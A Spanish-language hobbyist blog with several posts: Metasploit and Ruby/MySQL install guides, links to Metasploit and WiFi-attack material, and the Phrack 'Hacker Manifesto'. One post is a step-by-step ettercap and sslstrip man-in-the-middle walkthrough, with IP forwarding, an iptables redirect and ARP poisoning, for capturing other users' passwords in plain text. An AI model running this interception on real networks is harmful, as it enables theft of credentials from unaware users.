Bitacora Nula

Más reciente

La Seguridad Pt.2

Si hay algo genial que me ha servido mucho, y es algo que no e explotado en su totalidad, es el metasploit, me gusta mas usarlo en debian, debian me encanta para todo, para desarrollo de software, para servidor, como principal para ver videos, peliculas, todo 🙂

y no solo para lo comun, si no para las cosas jaxor 🙂

asi que pues, aqui les paso un tutorial de como instalar un metasploit en debian, para aquellos que no somos backtrackeros y que tenemos que buscar nuestros juguetes en la red…

aqui esta…

Saludos 🙂

Anuncios

La seguridad

Instalando ettercap en debian

Saben, la seguridad para mi es algo genial, no solo por el mundo infinito de posibilidades, si no simplemente porque te forza a ir mas alla, siempre ver mas alla, encontrar la manera de romper con la seguridad de algo, yo jamas me he considerado alguien maton en lograr esto, sin embargo e ido avanzando en esto.

Este tutorial es para aquellas personas que quieren capturar paquetitos de la red, y ver su contenido en texto plano, sobre todo de el contendo que de verdad le “importa” a algunos, a mi se me hace algo vil, usar un vil ettercap para sacar vil usuario y contraseña, y la verdad que me desagrada en cierta forma porque mucha gente con esto en sus manos hace muchas tonterias, recuerde que una persona que de verdad le gusta estar metido en la seguridad, no hace tonterias que hacen muchos, lo que de verdad se busca es, si encontraste alguna forma de explotar algo, hazlo, llega hasta lo ultimo que se podria llegar sin lastimar a nadie, y cuando ya llegaste a la compu del jefe de seguridad, a punto de destruir el mundo con viles bombas atomicas…

deja el boton rojo… no lo presiones… solo ponles un letrero gigante en todos sus servidores que diga… “oli ñ.ñ”

y fin ñ.ñ, podras irte como un gran triunfador, y le restregaras en la cara a este gran mundo y su sistema consumista que tiene un gran error 🙂 con un simple acto humilde de decir “oli ñ.ñ”

pero bueno, ya ando delirando muchas cosas

Comenzemos…

Ponte como root

Antes que nada, por ahi me recomendaron instalar las dependencias “apt-get install libnet0 libnet1-dev libssl-dev libltdl3-dev  libpcre3-dev libpcap0.8-dev ncurses-bin”

1.Para instalar ettercap simplemente lo instalamos de la forma mas sencillita, sin bajar codigo fuente y compilar y eso, solo has un vil “sudo apt-get install ettercap”

Listo

2.Instalamos el sslstrip, lo bajamos desde la pagina, asi que pon en google… “sslstrip” y baja la ultima version, deberas instalar el twister-web, el cual no se encontrara con ese nombre en los repositorios, simplemente bajalo como “python-twisted” y asi si lo encontraras…

Despues de instalarlo, espero que sepas como, esta muy facil, por favor no me pidas que te explique, te lo ruego

3.Recuerda modificar el etter.conf, que esta en /etc/etter.conf, descomentando las lineas para poder usar iptables…

4.hacemos el forward “echo 1 > /proc/sys/net/ipv4/ip_forward”

5.usamos el comando de iptables para los puertos “iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000”

6. dhclient para reiniciar y asi ñ.ñ

7.simplemente activamos el sslstrip que bajamos, “sslstrip -a -k -f”

en otra terminal, abrimos el ettercap en terminal, sin GTK, porque su GTK sucks ñ.ñ

ettercap -C -i wlan0 (en mi caso yo escucho de wlan0) jiji

ponemos una mascara de subred de 255.255.255.0

hacemos un unified &n1ff

escaneamos por hosts y los enlistamos, hacemos un mitm y en la entrada que nos saldra escribimos “remote”

una vez que los hosts escaneados se agragan a la lista…

das click en start…

y comienza la magia, todo esto se me hace una porqueria :(, pero es bueno saberlo, quiza algun dia sirva de algo…

la proxima un poco de metasploit, como instalarlo, y un poco de su uso.

Como digo, en esto de la seguridad no soy la gran cosa, la verdad solo me gusta para restregarle en la cara a este mundo que su sistema consumista esta mal ñ.ñ

hack the system 🙂

byte!

Instalación de Ruby, fxruby, y uso de mysql en debian

Parte 1

Desde hace un tiempo he estado en un taller de Ruby, en el cual como yo al ser usuario debianita, y no hacer uso de mi winbugs como las demas personas normales

e tenido que arreglarmelas solito u.u

a lo que me e encontrado con que muchas personas que usan linuts ñ.ñ

tambien tienen ligeros problemitas para ejectuar sus scripts de ruby al usar el require para ciertas tareas

aqui una guia de lo que yo he usado para para poder ejecutar todo esto

 

1.Instalamos Ruby

Simplemente puedes usar de 2 sopas

sudo apt-get install ruby-full

sudo apt-get install ruby

ambos te instalan ruby, y su interprete.

 

3.instalamos ruby gems

Esta parte tambien es mas simple

usando Sudo apt-get install rubygems

jojojo, muy simple, el chiste es que no podras usar “gem install fxruby” ni nada eso

si no tienes la librerias necesarias, ahi esta el detalle por lo cual escribo este post ñ.ñ

 

3. Instalamos la libreria para hacer uso de mysql

usamos

sudo apt-get install libmysql-ruby

*nota importante, Si no tienes mysql puedes instalarlo usando

sudo apt-get install mysql-server

en la instalación te pedira que le asignes una contraseña de root

y para usarlo escribimos en la terminal

mysql -h localhost -p -u root

para hacer la prueba podemos crear una base de datos entrando a mysql

e ingresando “create database Prueba;”

y con este script comprobamos que se haya podido hacer la conexion

 

<ruby>

require ‘rubygems’

require ‘mysql’

 

begin    #conectarse a MySQL server

dbh = Mysql.real_connect(“localhost”, “root”, “ble”, “Prueba”)

#cambiamos los parametros de ble, por nuestra contraseña, y Prueba por el nombre de #nuestra base de datos.

# obtener la version y desplegarla como string

puts “Server version: ” + dbh.get_server_info

rescue  Mysql::Error => e

puts “Error code: #{e.errno}”    puts “Error message: #{e.error}”

puts “Error SQLSTATE: #{e.sqlstate}” if e.respond_to?(“sqlstate”)

ensure

#desconectar del servidor    dbh.close if dbh

end

</ruby>

 

simplemente lo ejecutamos como “ruby nombredelscript.rb” y debe aparecer algo parecido a esto…

“Server version: 5.1.49-3”

si todo salio bn, continuamos ñ.ñ, si no pss comenten y ya vemos que onda 🙂

 

3.instalamos librerias para fxruby

para esto simplemente instalamos

sudo apt-get install libfox-1.6-dev

y

sudo apt-get install libxrandr-dev

despues de esto ya podremos instalar fxruby usando

sudo gem install fxruby

tardara unos minutitos pero se instalara.

con este otro script comprobamos que se haya podido instalar correctamente…

<ruby>
require ‘rubygems’

require ‘fox16’
app = Fox::FXApp.new

main = Fox::FXMainWindow.new(app, “Aprendiendo Ruby!”, :width => 200, :height =$

app.create

main.show(Fox::PLACEMENT_SCREEN)

app.run

</ruby>

lo ejecutamos como ruby nombredelscript.rb

 

FIN DE LA PARTE 1

la proxima explicare unas cositas mas, pero por ahora es todo 🙂

bayi ñ.ñ

Manipulación de redes inalambricas practicas

Aqui esta el como spoofear la red y como hacer una ataque DNS… 😉

lo cual les serviria para sacar cosas divertidas de la red y juguetear 😉

 

http://linux.mty.itesm.mx/archivos/presentaciones/ManipulacionWiFi.demo

 

Manipulación de redes inalambricas

Andando por el grupo de Linux del campus Monterrey me tope con esta presentación de manipulación de redes.

Espero les de una idea de como esta el rollo de las redes inalambricas, y lo inseguras que pueden ser.

 

http://linux.mty.itesm.mx/archivos/presentaciones/ManipulacionWiFi.pdf

Curso completo de metasploit

Ultimamente casi ya no e hecho muchas publicaciones, esto lo habia publicado en facebook, pero crei que muchas personas se sentirian algo ofendidas de esto.

E Aqui, un curso completo de metasploit

http://www.dragonjar.org/completo-curso-de-metasploit-en-video.xhtml

Publicado por la pagina de security tube, que dragonjar trae para nosotros ñ.ñ

disfrutenlo y aprendan, y ademas, hagan sus propios exploits, no sean lamers

que tengan un lindo dia.

La razon por la que pongo esto, es porque soy de la ideologia de dar incondicionalmente, sin esperar nada a cambio. Espero que asi puedan ser ustedes con las demas personas :), pues es lo mas grandioso de este mundo.

Manifesto Hacker

File: archives/7/p7_0x03_Hacker’s Manifesto_by_The Mentor.txt

==Phrack Inc.==
Volume One, Issue 7, Phile 3 of 10
=-=-=-=-=-=-=The following was written shortly after my arrest…
\/\The Conscience of a Hacker/\/
by
+++The Mentor+++
Written on January 8, 1986=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Another one got caught today, it’s all over the papers.  “TeenagerArrested in Computer Crime Scandal”, “Hacker Arrested after Bank Tampering”…        Damn kids.  They’re all alike.
But did you, in your three-piece psychology and 1950’s technobrain,ever take a look behind the eyes of the hacker?  Did you ever wonder whatmade him tick, what forces shaped him, what may have molded him?        I am a hacker, enter my world…        Mine is a world that begins with school… I’m smarter than most ofthe other kids, this crap they teach us bores me…        Damn underachiever.  They’re all alike.
I’m in junior high or high school.  I’ve listened to teachers explainfor the fifteenth time how to reduce a fraction.  I understand it.  “No, Ms.Smith, I didn’t show my work.  I did it in my head…”        Damn kid.  Probably copied it.  They’re all alike.
I made a discovery today.  I found a computer.  Wait a second, this iscool.  It does what I want it to.  If it makes a mistake, it’s because Iscrewed it up.  Not because it doesn’t like me…                Or feels threatened by me…                Or thinks I’m a smart ass…                Or doesn’t like teaching and shouldn’t be here…        Damn kid.  All he does is play games.  They’re all alike.
And then it happened… a door opened to a world… rushing throughthe phone line like heroin through an addict’s veins, an electronic pulse issent out, a refuge from the day-to-day incompetencies is sought… a board isfound.        “This is it… this is where I belong…”        I know everyone here… even if I’ve never met them, never talked tothem, may never hear from them again… I know you all…        Damn kid.  Tying up the phone line again.  They’re all alike…
You bet your ass we’re all alike… we’ve been spoon-fed baby food atschool when we hungered for steak… the bits of meat that you did let slipthrough were pre-chewed and tasteless.  We’ve been dominated by sadists, orignored by the apathetic.  The few that had something to teach found us will-ing pupils, but those few are like drops of water in the desert.
This is our world now… the world of the electron and the switch, thebeauty of the baud.  We make use of a service already existing without payingfor what could be dirt-cheap if it wasn’t run by profiteering gluttons, andyou call us criminals.  We explore… and you call us criminals.  We seekafter knowledge… and you call us criminals.  We exist without skin color,without nationality, without religious bias… and you call us criminals.You build atomic bombs, you wage wars, you murder, cheat, and lie to usand try to make us believe it’s for our own good, yet we’re the criminals.
Yes, I am a criminal.  My crime is that of curiosity.  My crime isthat of judging people by what they say and think, not what they look like.My crime is that of outsmarting you, something that you will never forgive mefor.
I am a hacker, and this is my manifesto.  You may stop this individual,but you can’t stop us all… after all, we’re all alike.
+++The Mentor+++

__________________________________________________________________